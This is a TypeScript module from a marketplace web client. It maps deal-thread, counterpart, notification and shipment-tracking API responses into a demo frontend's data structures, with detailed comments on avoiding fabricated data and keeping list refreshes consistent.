         HOME deal card, not the deals page) does
         `esc((t.cta || "View deal").toUpperCase())` — an object there throws
         and takes the home page down with it.

         ⚠️ AND cta IS NULL WHILE act IS TRUE on a pending offer: rowStatus()
         golds "NEW OFFER" because the recipient must respond, while cta() only
         covers pay/ship/confirm. Anything keyed off `act` must not assume a cta
         exists. */
      cta: d.cta?.label ?? null,
      fees: null,
      /* His steps are [label, state] TUPLES (destructured at app.js:1889); ours
         are objects. windowHint is composed onto the label because his own
         fixture carries it inline — "PAY · 48H", "SHIP · 2 LEGS" — rather than
         as a second field.

         null when the stepper says not to show: his renderer guards
         `${t.steps ? ... : ""}`, so null is the correct "no ladder yet" and an
         empty array would paint an empty rail. */
      steps: d.stepper.show
        ? d.stepper.steps.map(
            (s) => [s.windowHint ? `${s.label} · ${s.windowHint}` : s.label, s.state] as [string, string],
          )
        : null,
      tracking: null,
      incomingDispute: null,
      history: [],
      msgs: [],
      previewLine,
      activityAt: row.activityAt,
      /* Namespaced, and deliberately NOT one of Blake's fields — same rule as
         __gbzOfferId. The counter endpoints are written in canonical direction
         (offeredItems/cashAmount are the BUYER's side no matter who sends), and
         his composer always edits MY side, so a seller's counter has to be
         redirected to the requested side. That decision needs this fact, and
         `iAmBuyer` is computed here already. Emitting it beats re-deriving it
         from where the items landed: two derivations of one fact drift.
         Safe to carry — app.js never serializes a THREADS row nor iterates its
         keys, checked two search shapes. Read back via __gbzThreadIsBuyer. */
      /* 🔑 HIS OWN ROUTING FIELD, WHICH THIS MAPPER HAS NEVER EMITTED — so the
         rule he wrote for it has been dead on every real thread. Two readers:
         renderThread stamps "· sent from the Exchange" on the offer line
         (app.js:1941), and isSimpleOffer (app.js:3285) sends the Counter button
         to the Exchange builder instead of the sheet.

         🔴 THE SECOND ONE IS WHY THIS IS HERE, and it is an honesty fix rather
         than a feature. The list route sends only the OFFERED side of an offer's
         items — offeredItems.ts filters `side = 'offered'` — so an offer composed
         in the Exchange can carry a REQUESTED side that the web cannot see at
         all. The counter sheet re-states a deal as the sheet SHOWS it, so
         countering such an offer from the sheet would silently drop terms nobody
         on this client could have known were there. Routing those to the Exchange
         is exactly what Blake's own rule already says to do.

         Absent or null origin reads false, which is the pre-existing behaviour. */
      viaExchange: d.offer.origin === "exchange",
      __gbzIAmBuyer: iAmBuyer,
      __gbzListOfferId: d.offer.id,
      /* The head offer's status and last write, as this list read saw them: the open-thread poll's two other
         stale-list tells beside the id (DemoThread). Both are on the list wire already (the row ships whole). */
      __gbzListStatus: d.offer.status,
      __gbzListUpdatedAt: d.offer.updatedAt,
    };
  });
}

/**
 * Every counterpart, as a USERS entry.
 *
 * NOT optional enrichment. renderThread reads `USERS[t.with].level` and
 * `.trades` with no guard, and USERS only ever held sellers from the listings
 * feed — so a counterpart with no live listing is absent and the deals view
 * throws on the first render. These rows are thin on purpose: the list response
 * carries id, username and avatar and nothing else, so everything below that is
 * an honest UNKNOWN (null) rather than a guess — see mapSellerToUser's own
 * comment for why null and not 0. app.js's own render sites format a null
 * trades/sales/followers/following as "—" (UNKNOWN_METRIC, data.js), so
 * `.trades` reads with no guard the way this comment already describes.
 * The gamification fields exist for the same reason they do on
 * mapSellerToUser — three renderers dereference them bare.
 */
export function mapDealCounterparts(rows: ApiDealThreadRow[]): Record<string, DemoUser> {
  const users: Record<string, DemoUser> = Object.create(null);
  for (const row of rows) {
    if (!row.counterpart.username) continue;
    const handle = row.counterpart.username;
    users[handle] = {
      id: row.counterpart.id,
      handle,
      avatar: safeUrl(row.counterpart.avatar) || undefined,
      initials: row.counterpart.username.slice(0, 2).toUpperCase(),
      level: "",
      /* THE SECOND PRODUCER of this field, and it was still hardcoded after
         mapSellerToUser stopped being. These rows are thin on purpose — the
         list response carries id, username and avatar and everything below is
         an honest zero — but memberSince is not a "no source" case any more:
         the same one-column argument that closed it for sellers applies here,
         and the deal-threads list route now selects users.createdAt for it.

         🪤 It reaches a GUEST rail. A deal counterpart lands in USERS whether
         or not they have a live listing, and topCollectors() ranks USERS with
         no minimum-activity threshold — so a counterpart with nothing could
         occupy a Top Collections slot and paint "Member Since " blank. Real
         data closes that; the label gate in demoTextFixups closes the residual
         (an older response, or any future producer that forgets). */
      memberSince: sellerMemberSince(row.counterpart.createdAt),
      /* HONEST UNKNOWN, not an honest zero — same ruling as mapSellerToUser's
         own sales/followers/following, applied here for the same reason: the
         list response carries id/username/avatar/createdAt and nothing else,
         so trades/sales/followers/following have no source on THIS row. A
         literal 0 here is indistinguishable from "zero trades, confirmed" —
         null renders as "—" (UNKNOWN_METRIC, data.js) everywhere these are
         read instead. profileFixups.ts's Trades-tile patch (GET
         /api/users/:id's tradeCount) can upgrade trades the moment this
         handle's own profile is visited directly; nothing upgrades sales. */
      trades: null,
      sales: null,
      bio: "",
      followers: null,
      following: null,
      ratings: 0,
      badges: [],
      lvl: 1,
      lvlKnown: false, // no points on this wire — see DemoUser.lvlKnown
      pts: 0,
      ptsNext: 0,
      streak: 0,
      points: "0 pts",
      pinned: [],
    };
  }
  return users;
}

/**
 * Fetches the deal list and installs it through the bridge.
 *
 * BEST-EFFORT, same posture as the wallet: the bridge already cleared THREADS
 * to an empty array at boot and Blake ships an honest empty state for it
 * ("Nothing here yet. Completed deals land with their verdicts."), so a failure
 * degrades to that rather than to fabricated deals.
 *
 * ⚠️ Boot-time today, and the same lazy argument the lane made for tracking
 * applies here too — the bridge sibling stays callable for the life of the tab
 * so this can move behind a #/deals navigation without touching the mapper.
 */
export async function installDeals(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
  myUserId: string,
): Promise<number> {
  const bridge = (
    win as unknown as {
      __gbzInstallDeals?: (threads: DemoThread[], users: Record<string, DemoUser>) => void;
    }
  ).__gbzInstallDeals;
  if (typeof bridge !== "function") {
    throw new Error("installDeals: bridge script has not run yet (__gbzInstallDeals missing)");
  }

  const res = await authFetch("/api/deal-threads?limit=100");
  if (!res.ok) {
    console.warn(
      "[web-install] deals: GET /api/deal-threads failed (" +
        res.status +
        ") - leaving THREADS empty, which is Blake's own empty state",
    );
    return 0;
  }
  const rows = (await res.json()) as ApiDealThreadRow[];

  const threads = rows.flatMap((r) => mapDealThread(r, myUserId));
  const dropped = rows.filter((r) => !r.counterpart.username).length;
  if (dropped > 0) {
    // Named, not silent: an absent thread is invisible, and the only way to
    // answer "where did my conversation go" is for the drop to say so.
    console.warn(`[web-install] deals: dropped ${dropped} thread(s) whose counterpart has no username`);
  }

  bridge(threads, mapDealCounterparts(rows));
  return threads.length;
}

/**
 * Re-reads the deal list and merges it over the rows already installed.
 *
 * THE READ-BACK FOR AN OFFER ACTION. None of accept / decline / cancel returns
 * a repaintable row — all three answer a flat { ok: true } (offers.ts) — and the
 * derived triple the deals surface renders (status.word, cta, stepper) is
 * computed by lib/dealState on the SERVER, which support cannot reach. So the
 * only honest way to learn what a write did is to ask the list route again.
 *
 * 🔴 THE WHOLE LIST, NEVER ONE ROW, and that is not caution — it is arithmetic.
 * Accepting an offer runs retireSiblingOffersOnAccept (offerRetirement.ts),
 * which sets EVERY other pending offer on that listing to 'declined'. Those
 * live in OTHER thread rows, on screen, right now. It also locks the listing to
 * 'pending', bumps the conversation (so activityAt, preview and unread all
 * move) and re-sorts the rows. A single-row patch would leave a visitor looking
 * at a competing offer that the server had already killed.
 *
 * Merge, not install: see __gbzRefreshDeals in the bridge for why reinstalling
 * would blank every thread the visitor has opened.
 *
 * Returns the row count, or null when the re-read failed. Null is not a write
 * failure and must never be reported as one — by the time this runs the action
 * has already landed on the server, so a failure here costs a repaint, not the
 * accept. Same posture as commentPost's refresh().
 *
 * READ AND APPLY ARE SPLIT (readDeals / applyDeals), the way installDealThread
 * and installThreadEvents are: the open-thread poll (dealThreadPoll.ts) reads
 * the list when the open person's offers moved, then has to decide whether the
 * answer is still wanted (its epoch, a send on the wire, the thread still open,
 * the counter sheet closed) before anything repaints, and applies it for THAT
 * PERSON ONLY inside its keep-your-place bracket. This function is the two
 * halves back to back, for every action that re-reads after a write.
 */
export async function refreshDeals(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
  myUserId: string,
): Promise<number | null> {
  const read = await readDeals(win, authFetch, myUserId);
  return read ? applyDeals(win, read) : null;
}

/** One list read, mapped and not yet installed: what applyDeals installs. */
export interface DealsRead {
  threads: DemoThread[];
  users: Record<string, DemoUser>;
}

type RefreshBridge = (threads: DemoThread[], users: Record<string, DemoUser>, onlyUserId?: string) => number;
function refreshBridge(win: Window): RefreshBridge {
  const bridge = (win as unknown as { __gbzRefreshDeals?: RefreshBridge }).__gbzRefreshDeals;
  if (typeof bridge !== "function") {
    throw new Error("refreshDeals: bridge script has not run yet (__gbzRefreshDeals missing)");
  }
  return bridge;
}

/**
 * The read half of refreshDeals: the list route, mapped. Null when the read
 * failed (said once, in the console); the caller decides what that costs.
 */
export async function readDeals(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
  myUserId: string,
): Promise<DealsRead | null> {
  refreshBridge(win); // refuse before the request, as refreshDeals did before the split
  // The same request installDeals makes, deliberately identical: two reads of
  // one route that disagreed about limit or query would be two different lists.
  const res = await authFetch("/api/deal-threads?limit=100");
  if (!res.ok) {
    console.warn(
      "[web-install] deals: re-read of the list failed (" +
        res.status +
        ") - the rows on screen are now stale, any write that caused it stands",
    );
    return null;
  }
  const rows = (await res.json()) as ApiDealThreadRow[];
  if (!Array.isArray(rows)) {
    // A list that is not a list is a failed read, said the same way, never a
    // throw: on the one-shot path a throw here would leave the thread empty.
    console.warn("[web-install] deals: re-read of the list answered something that is not a list - the rows on screen are now stale");
    return null;
  }
  return { threads: rows.flatMap((r) => mapDealThread(r, myUserId)), users: mapDealCounterparts(rows) };
}

/**
 * The apply half: the merge-in-place refresh through the bridge, for everyone
 * (no id) or for ONE PERSON's rows (their user id: the open-thread poll and a
 * one-shot thread read behind a stale list, installListThenEvents, so a list
 * read nobody chose cannot move anyone else's row, slide the pane to another
 * person or paint their dot; see __gbzRefreshDeals). Returns the row count.
 *
 * Every apply moves the thread-write epoch, as installThreadEvents does: a poll
 * answer (the thread's or the list's) that was already out when this landed
 * predates it, and the poll drops it (dealThreadPoll.ts read). The thread
 * re-read that follows an action bumps it again; two bumps cost nothing.
 */
export function applyDeals(win: Window, read: DealsRead, onlyUserId?: string): number {
  const n = refreshBridge(win)(read.threads, read.users, onlyUserId);
  threadWrites(win).epoch++;
  return n;
}

/* ══════════════════════════════════════════════════════════════════════════
   THE BELL + ACTIVITY DRAWER (F4)

   GET /api/notifications' real row (api-server/src/routes/notifications.ts,
   toPublicNotification serializer, plus actorUsername/actorAvatar) into
   Blake's `NOTIFICATIONS[]` shape (data.js fixture: `{ listing, event, when,
   lid?, thread? }`, plus `who` and `actorAvatar` for the person behind the
   row), read by renderActivityDrawer and the [data-adgo] click handler, both
   app.js.
   ══════════════════════════════════════════════════════════════════════════ */

/** GET /api/notifications row — only the fields this lane reads. `data` (a
 *  free-text nav payload) is dropped: Blake's drawer never reads it. The two
 *  actor fields are the person behind relatedUserId, looked up by the server
 *  at read time (routes/notifications.ts:44-45): null when the row has no
 *  person or that account is gone. Optional, so a row from before they were
 *  read here still types. */
export interface ApiNotification {
  id: string;
  type: string;
  title: string;
  body: string;
  relatedListingId: string | null;
  relatedUserId: string | null;
  isRead: boolean;
  createdAt: string;
  actorUsername?: string | null;
  actorAvatar?: string | null;
}

/**
 * Blake's `NOTIFICATIONS[]` row, PLUS `isRead`.
 *
 * `isRead` (his fixture never carried it) is what the bell's number counts
 * (app.js bellUnreadCount, with `onBell`) and what paints a drawer row as
 * unread; notificationsRead.ts flips it in memory on a tap and on Mark all as
 * read. An honest extra field, not a fabricated one: the server row it comes
 * from is real.
 */
export interface DemoNotification {
  listing: string;
  event: string;
  when: string;
  lid?: string;
  thread?: string;
  /** A new_message row's sender (relatedUserId). The drawer's click opens that
   *  person's thread on Deals through __gbzThreadIdForUser; a message names no
   *  listing, so it never gets a `thread` key of its own (see below). */
  messageFrom?: string;
  /** WHO did it, as the row's lead line: "@handle" when the row has a person
   *  (relatedUserId set, not the viewer) with a handle; "Someone" when the
   *  server sent a person it could not name (relatedUserId set, actorUsername
   *  empty: the defensive branch the app keeps too, `actorUsername ??
   *  'Someone'`; a DELETED account nulls relatedUserId through the FK's
   *  ON DELETE SET NULL, so its row reads as a row with no person); absent
   *  when the row has no person (a system notice, a Looking For match, the
   *  escrow sale) or when the person is the viewer (their own coin flip). The
   *  drawer paints it in place of the server's title, once per row, the way
   *  the app's Activity row leads with the handle (card 1219300833363291,
   *  Blake 2026-10-08, option (a); the look picked 2026-10-17). */
  who?: string;
  /** The person's picture (actorAvatar through safeUrl), for the row's 44px
   *  slot when the row has no listing picture. Absent without a person or
   *  without a safe URL. */
  actorAvatar?: string;
  /** The server row's id, so a tap can name the row to PATCH
   *  /api/notifications/:id/read (card 1219063265423680). Optional only so a
   *  fixture row without one still types; every mapped row carries it. */
  id?: string;
  /** Whether the row counts on the bell and paints as unread in the drawer:
   *  every type outside the app's deals set (ON_BELL_EXCLUDED below). A deal
   *  or message row keeps showing in the drawer, always in the read style: its
   *  unread lives on the Deals badge and in the thread, so nothing counts
   *  twice (lane A for Blake, 2026-10-17, card 1219063265423680). */
  onBell: boolean;
  isRead: boolean;
}

/**
 * The app's deals set (artifacts/mobile/lib/notificationSurface.ts:24-36): the
 * rows its Activity list hides and its badge never counts, because their
 * unread is the conversation's or the deal's. The website keeps them in the
 * drawer and leaves them out of the bell's number. Every other server type
 * counts, the fifteen the app leaves unmapped included (tag_mention,
 * listing_under_review, system, system_alert, promotion, promo_*, shipment_*,
 * offer_ship_default_review, offer_ship_escalation): a person's mention is a
 * thing to see, whatever the app does with it.
 */
const ON_BELL_EXCLUDED = new Set([
  "new_message", "offer_countered", "offer_expired", "offer_ship_expired",
  "dispute_opened", "dispute_resolved", "new_offer", "offer_accepted",
  "offer_declined", "message_liked", "dm_liked",
]);

/**
 * Notification `type` values that describe something happening ON A DEAL
 * THREAD, as opposed to a listing or account-level event. Only these compose
 * a `thread` alias key — everything else routes through `lid` alone (or
 * nowhere, for a row with neither).
 *
 * Enumerated from notificationTypeEnum (lib/db/src/schema/social.ts), not
 * guessed: every member naming an offer, a trade in flight, or a dispute on
 * one. Shipment/order events are the buyer/seller side of an ALREADY-
 * ACCEPTED offer and are deal-shaped for the same reason. Listing engagement
 * (likes/comments/votes/upvotes), account/system notices and "new_message"
 * are deliberately excluded: a message notification has no guarantee its
 * conversation is actually a DEAL (it may be chat-only, mapDealThread's own
 * `chatOnly: true` row, whose id is `row.key` — not the `d:<user>:<listing>`
 * alias format this composes), so treating it as thread-shaped risks a
 * `thread` value that resolves to the WRONG row rather than none at all.
 */
const DEAL_SHAPED_NOTIFICATION_TYPES = new Set([
  "new_offer", "offer_accepted", "offer_declined", "offer_expired",
  "offer_countered", "offer_ship_expired", "offer_ship_escalation",
  "offer_ship_default_review",
  "trade_completed", "trade_confirm_needed",
  "order_shipped", "order_delivered", "order_awaiting_confirm",
  "order_delivery_issue", "order_returned", "item_shipped",
  "dispute_opened", "dispute_resolved",
  "dispute_response_due_soon", "dispute_response_window_closed",
]);

/**
 * GET /api/notifications rows into his shape.
 *
 * `when` reuses `stamp()` below — the same "Aug 21 · 9:12 AM" formatter every
 * other timestamp in this file's detail view takes — rather than a third
 * one-off Intl call.
 *
 * `thread` is composed ONLY when both `relatedUserId` and `relatedListingId`
 * are present AND `type` is deal-shaped: the real row has no
 * `relatedThreadId` field (recon Q8/Q1), so the alias key has to be built
 * from the same two ids mapDealThread keys its own threads off
 * (`d:${row.counterpart.id}:${d.offer.listingId}`), and building it from a
 * type that names no counterpart would silently resolve nothing.
 *
 * `lid` is kept alongside `thread` when both are derivable — Blake's fixture
 * never carries both on one row, but nothing stops it, and a deal-shaped
 * notification that also names its listing gets a real thumbnail
 * (renderActivityDrawer's `a.lid && LISTINGS.find(...)` lookup) while the
 * click handler still prefers `a.thread` first, unchanged.
 */
/* Rows written before the server stopped naming the liker in the comment-like
   and message-like bodies (card 1219300833363291, option (a)) keep that body
   for good: nothing prunes notifications, and GET returns the latest 50. Once
   the row leads with the handle, that name would show twice, so the old
   template is recognized and reduced to the new sentence. The old template was
   exactly "<one token> liked your comment." / "... message." (routes/comments.ts
   and routes/conversations.ts before this change, "Someone" its fallback, a
   points sentence sometimes after it), gated on the two types that ever wrote
   it. A renamed account still matches: the shape, not the current handle. */
const OLD_LIKE_BODY = /^\S+ liked your (comment|message)\.(?=$|\s)/;
function dropOldLikerName(type: string, body: string): string {
  if (type !== "comment_liked" && type !== "message_liked") return body;
  return body.replace(OLD_LIKE_BODY, "Liked your $1.");
}

/* A message that is exactly the app's shared-listing token reads as the words
   the thread uses for it. The server's in-app row for a new message carries the
   message body itself, cut to 120 (routes/conversations.ts dispatchPush), so
   the drawer would print the token. Only a message row, only the whole token:
   the app's rule is anchored at both ends. The push banner on a phone is the
   server's and still shows the token; that is not the website's to rewrite. */
function sharedListingWords(type: string, body: string): string {
  if (type !== "new_message") return body;
  return SHARED_LISTING_RE.test(body) ? SHARED_LISTING_FALLBACK : body;
}

/** `myUserId`: the signed-in viewer. A row whose person is the viewer (their
 *  own coin flip, offers.ts passes the flipper) leads with its title, not the
 *  viewer's own handle. Optional, so a caller without it still maps. */
export function mapNotification(row: ApiNotification, myUserId?: string | null): DemoNotification {
  const out: DemoNotification = {
    listing: row.title ?? "",
    event: sharedListingWords(row.type, dropOldLikerName(row.type, row.body ?? "")),
    when: stamp(row.createdAt),
    onBell: !ON_BELL_EXCLUDED.has(row.type),
    isRead: row.isRead === true,
  };
  if (row.id) out.id = row.id;
  if (row.relatedListingId) out.lid = row.relatedListingId;
  if (row.relatedUserId && row.relatedListingId && DEAL_SHAPED_NOTIFICATION_TYPES.has(row.type)) {
    out.thread = `d:${row.relatedUserId}:${row.relatedListingId}`;
  }
  /* The person, not a key: which row is theirs is a question for the rows on the
     page when the visitor taps, which is when the drawer asks it. */
  if (row.type === "new_message" && row.relatedUserId) out.messageFrom = row.relatedUserId;
  /* WHO did it. A row has a person when relatedUserId is set and it is not the
     viewer; the handle is the server's read-time lookup of that id (null only
     when the server could not name it, which reads "Someone" as in the app).
     The "@" belongs to the lead line, never to "Someone". */
  if (row.relatedUserId && row.relatedUserId !== myUserId) {
    out.who = row.actorUsername ? `@${row.actorUsername}` : "Someone";
    const picture = safeUrl(row.actorAvatar);
    if (picture) out.actorAvatar = picture;
  }
  return out;
}

export function mapNotifications(rows: ApiNotification[], myUserId?: string | null): DemoNotification[] {
  return rows.map((row) => mapNotification(row, myUserId));
}

/**
 * Fetches the notification list and installs it through the bridge.
 *
 * BEST-EFFORT, same posture as deals/wants: the bridge already cleared
 * NOTIFICATIONS to an empty array at boot, and Blake's own renderer degrades
 * to nothing painted for an empty rail — this file's app.js half (F4c) adds
 * an honest "No activity yet." message and no number on the bell for that
 * case, rather than leaving 834px of blank drawer.
 *
 * `repaint` (default true): false installs the rows without repainting; a
 * function is asked when the rows land (notificationsRead.ts passes "while the
 * drawer is open, or not while the visitor is typing").
 */
export async function installNotifications(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
  myUserId?: string | null,
  opts?: { repaint?: boolean | (() => boolean) },
): Promise<number> {
  const bridge = (
    win as unknown as { __gbzInstallNotifications?: (rows: DemoNotification[], repaint?: boolean) => number }
  ).__gbzInstallNotifications;
  if (typeof bridge !== "function") {
    throw new Error("installNotifications: bridge script has not run yet (__gbzInstallNotifications missing)");
  }
  const res = await authFetch("/api/notifications");
  if (!res.ok) {
    console.warn(`[web-install] notifications: GET /api/notifications failed (${res.status}) — list left as it was`);
    return 0;
  }
  const body = (await res.json()) as ApiNotification[];
  if (!Array.isArray(body)) return 0;
  const repaint = typeof opts?.repaint === "function" ? opts.repaint() : opts?.repaint !== false;
  return bridge(mapNotifications(body, myUserId), repaint);
}

/* ══════════════════════════════════════════════════════════════════════════
   THREAD DETAIL — msgs, history and carrier tracking (transactional lane)

   The LIST pass ships msgs/history as empty arrays and tracking as null, all
   guarded by Blake's own code. This fills them in when a thread is OPENED,
   which is the same lazy shape installLiveListingComments already uses and the
   reason the bridge siblings stay callable for the life of the tab.

   WHAT IS STILL NOT FILLED IN, and why:

     fees   Needs GET /api/offers/:id/trade-checkout-summary, which makes a LIVE
            Shippo call. renderThread only shows fees when t.accepted
            (app.js:1885), so it is one call per opened ACCEPTED thread rather
            than per row — cheap enough, but it is a separate concern from the
            two reads below and lands with checkout.

   🪤 SYSTEM EVENTS ARE NOT CARRIER SCANS. The events stream carries five of our
   own lifecycle transitions (accepted / paid / seller_shipped / buyer_shipped /
   delivered) read off offer timestamps. Blake's tracking list holds CARRIER
   scans — "Departed regional facility", "Out for delivery". Mapping ours into
   his would fabricate a shipment history we do not have, at a granularity we
   never observed. They are deliberately dropped here.
   ══════════════════════════════════════════════════════════════════════════ */

export interface ApiThreadEventsResponse {
  key: string;
  conversationId: string | null;
  focusListingId: string | null;
  /* 🪤 declaredValue/cashPrice were ALREADY on the wire and this type simply
     did not admit them: deal-threads.ts' events route has selected both since
     rework C2a and ships the row whole (`Object.fromEntries(listingRows...)`).
     A type narrower than the wire is not a safe default — it silently dropped
     the two fields the history rows below need, which is why they painted $0.
     No server change was needed for this one. */
  listings: Record<
    string,
    { id: string; title: string | null; images: string[] | null; declaredValue: number | null; cashPrice: number | null }
  >;
  openDisputeOfferIds: string[];
  /** Carrier scans keyed by OFFER id, each split into seller/buyer legs. */
  tracking: Record<string, ApiOfferTracking>;
  events: ApiThreadEvent[];
}

export interface ApiOfferTracking {
  seller: ApiTrackingLeg;
  buyer: ApiTrackingLeg;
}

export interface ApiTrackingLeg {
  trackingNumber: string | null;
  carrier: string | null;
  trackingUrl: string | null;
  events: Array<{
    id: string;
    status: string;
    statusDetail: string | null;
    location: string | null;
    occurredAt: string | null;
    receivedAt: string;
  }>;
}

export type ApiThreadEvent =
  | { type: "message"; at: string; message: { id: string; body: string; senderId: string }; sender: { id: string; username: string | null } | null }
  | {
      type: "offer";
      at: string;
      offer: {
        id: string;
        listingId: string;
        fromUserId: string;
        toUserId: string;
        proposedByUserId: string | null;
        cashAmount: number | null;
        /** Buy Now seller figure — see the list row's note on both. */
        isBuyNow?: boolean;
        sellerCashProceeds?: number;
        /** The SELLER's side. See the list row's own note on why this is named. */
        requestedCashAmount: number | null;
        qrCodeUrl: string | null;
        buyerQrCodeUrl: string | null;
        buyerConfirmed: boolean;
        sellerConfirmed: boolean;
        /** The row ships whole (deal-threads.ts buildThreadEvents), so both are
         *  on the wire; optional here because older fixtures predate them.
         *  Read only to decide whether the viewer's own leg may show its
         *  drop-off code (see mapThreadDetail). */
        status?: string;
        /** The row's last write, ISO. On the wire whole-row like `status` (and the same column the list
         *  row's updatedAt comes from), read by the open-thread poll's stale-list check beside the id and
         *  the status; optional because older fixtures predate it, and a missing one is unknown, never a
         *  difference. */
        updatedAt?: string;
        offerType?: string | null;
        offeredItems?: ApiDealOfferedItem[];
        /** The note typed with the offer, counter or Exchange. Stored only on
         *  the offer row (offers.message); the events route ships the row
         *  whole, so it is already on the wire. */
        message?: string | null;
      };
      listingId: string;
      isLatest: boolean;
      isSuperseded: boolean;
    }
  | { type: "system"; at: string; kind: string; listingId: string };

/** The subset of a Blake thread this pass fills in. */
export interface DemoThreadDetail {
  /** `__gbzUncounted`: namespaced, ours, not Blake's. Set on the two kinds of
   *  painted line the server's lastReceivedAt never counts (see mapThreadDetail
   *  and the bridge's __gbzPaintedReceivedMs). His readers of a line (msgBubbleHTML,
   *  personRow's last line, buildTimeline) read only from, text, when, at, items
   *  and item by name, and nothing serializes a line or walks its keys. */
  msgs: Array<{
    from: string;
    text: string;
    when: string;
    at: string;
    __gbzUncounted?: true;
    /** The card a shared listing paints (msgBubbleHTML draws the card and not
     *  the text when it is set; the text stays the words for the row line).
     *  Filled here from the events response; the bridge fills it from the floor
     *  and the closet when the response does not name the listing. */
    item?: DemoThreadItem;
    /** The shared listing's id, so the bridge can look it up where the mapper
     *  cannot (LISTINGS and MY_COLLECTION are page globals). Namespaced, ours. */
    __gbzSharedLid?: string;
  }>;
  history: Array<{
    who: string;
    summary: string;
    state: string;
    when: string;
    at: string;
    hMine: DemoThreadSide | null;
    hTheirs: DemoThreadSide | null;
  }>;
  tracking: { legs: DemoTrackingLeg[] } | null;
  /** The latest offer in this chain, for the per-OFFER fee endpoint. Null when
   *  the chain carries no offer at all (a chat-only thread). */
  acceptedOfferId: string | null;
  /** The pair's conversation, straight off the events response, so a send can
   *  skip the find-or-create round trip. Null before either side has spoken. */
  conversationId: string | null;
  /**
   * Does this chain's live offer have an OPEN support ticket against it?
   *
   * Read straight off `openDisputeOfferIds`, which the events route already
   * computes with the escrow-release gate's own definition (offer-linked
   * tickets with status != 'closed'). NOT re-derived: web has refused to
   * re-implement lib/dealState three times and this is a flag, not a state.
   *
   * A boolean rather than the four fields it implies, because the bridge is
   * where Blake's own transition lives — see __gbzInstallDealThread, which
   * applies the exact four assignments his own dispute handler makes
   * (app.js:4451). A false must not clobber what the list already computed,
   * which is the whole reason this is not `cta: string | null`.
   */
  disputed: boolean;
}

export interface DemoTrackingLeg {
  dir: "you" | "them";
  title: string;
  status: string;
  qr: boolean;
  confirm: boolean;
  events: Array<{ when: string; what: string }>;
  /**
   * Set ONLY on the viewer's own outbound leg while it still awaits a
   * drop-off: the offer to address and which route pair belongs to it
   * (seller: label-qr + /ship; a trade buyer: label-qr + /buyer-ship).
   * `dropped` is the server's own shippedAt / buyerShippedAt, read off the
   * system events. It carries NO code: the real one is fetched on a tap
   * (shipDropOff.ts).
   */
  ship: { offerId: string; side: "seller" | "buyer"; dropped: boolean } | null;
}

/**
 * Blake's own money() (data.js:830), reproduced because his helpers live in a
 * classic script's global lexical scope and this ES module cannot reach them by
 * name — the same constraint that makes the bridge a string.
 *
 * Reproduced EXACTLY, including the integer branch: his summary strings read
 * "$1,350" and not "$1,350.00", and a history row formatted differently from
 * the ledger beside it would read as two different numbers.
 *
 * Exported (2026-08-26) for demoTextFixups.ts's wallet fixups, which paint a
 * dollar figure INTO his wallet and must format it the way the figures beside
 * it are formatted — the same one-source rule, one module further out.
 */
export function demoMoney(n: number): string {
  const opts = Number.isInteger(n)
    ? { maximumFractionDigits: 0 }
    : { minimumFractionDigits: 2, maximumFractionDigits: 2 };
  return "$" + n.toLocaleString("en-US", opts);
}

/** "Aug 21 · 9:12 AM" — the shape every timestamp in his detail view takes. */
function stamp(iso: string | null): string {
  if (!iso) return "";
  return `${formatMonthDay(iso)} · ${formatClockTime(iso)}`;
}

/**
 * One carrier scan -> one of Blake's { when, what } rows.
 *
 * `what` is the CARRIER's own words, joined with the location it reported.
 * Nothing is synthesised: a scan with no statusDetail falls back to the raw
 * status code rather than to a sentence we made up, because his list reads as
 * a shipment history and an invented line there is indistinguishable from a
 * real one.
 */
function scanToRow(e: ApiTrackingLeg["events"][number]): { when: string; what: string } {
  const detail = e.statusDetail || e.status;
  return {
    // occurredAt is nullable on the column; receivedAt is NOT NULL and is when
    // the webhook reached us, which is the honest fallback.
    when: stamp(e.occurredAt ?? e.receivedAt),
    what: e.location ? `${detail} · ${e.location}` : detail,
  };
}

/**
 * De-dupes scans on (status, occurredAt).
 *
 * The Shippo webhook inserts a fresh row on EVERY delivery including
 * redeliveries — `id: randomUUID()`, no upsert anywhere in the repo — so the
 * same physical scan can be stored more than once. His list would show it
 * twice, which reads as the parcel moving twice.
 */
function dedupeScans(events: ApiTrackingLeg["events"]): ApiTrackingLeg["events"] {
  const seen = new Set<string>();
  const out: ApiTrackingLeg["events"] = [];
  for (const e of events) {
    const k = `${e.status}|${e.occurredAt ?? ""}`;
    if (seen.has(k)) continue;
    seen.add(k);
    out.push(e);
  }
  return out;
}

/**
 * One leg of a shipment.
 *
 * 🔴 `qr` IS ALWAYS FALSE, and that is not laziness. A truthy `qr` makes Blake
 * render a GENERATED qrSVG — a graphic he draws, not our label. The real
 * drop-off code is a signed URL from GET /api/orders/:offerId/qr. Painting a
 * fabricated QR on a shipping screen is the fabrication class at its worst,
 * because someone carries it to a counter and it does not scan. It goes true
 * only once Blake swaps qrSVG for an <img> on the real URL.
 *
 * The real code now reaches the viewer's OWN leg another way: `ship` marks the
 * leg and shipDropOff.ts fetches the server's code on a tap, painted as an
 * <img> by app.js's renderShipPanel. `qr` still stays false, so his generated
 * graphic is never drawn.
 *
 * `status` prefers the newest carrier scan. With a label but no scans yet the
 * honest word is his own "QR READY"; with neither it is "LABEL PENDING", which
 * says what is true rather than implying a shipment exists.
 */
function mapLeg(
  dir: "you" | "them",
  title: string,
  leg: ApiTrackingLeg,
  hasLabel: boolean,
  awaitingMyConfirm: boolean,
  ship: DemoTrackingLeg["ship"],
): DemoTrackingLeg {
  const scans = dedupeScans(leg.events);
  const newest = scans.length ? scans[scans.length - 1] : null;
  const status = newest ? (newest.statusDetail || newest.status).toUpperCase() : hasLabel ? "QR READY" : "LABEL PENDING";
  return {
    dir,
    title,
    status,
    qr: false,
    confirm: awaitingMyConfirm,
    events: scans.map(scanToRow),
    /* Only while no carrier scan exists: a scanned parcel has been handed over,
       so there is nothing left to show a code for. */
    ship: scans.length === 0 ? ship : null,
  };
}

/**
 * The server's acceptance DM, matched the way the app matches it
 * (deal-thread/[key].tsx isAcceptanceDm): the "Your offer|trade on … was
 * accepted!" phrase AND the "Offers tab" bounce, so ordinary chat never trips
 * it. The copy lives in api-server lib/offerCopy.ts; if it changes, the app's
 * copy of this match changes with it, and so must this one.
 */
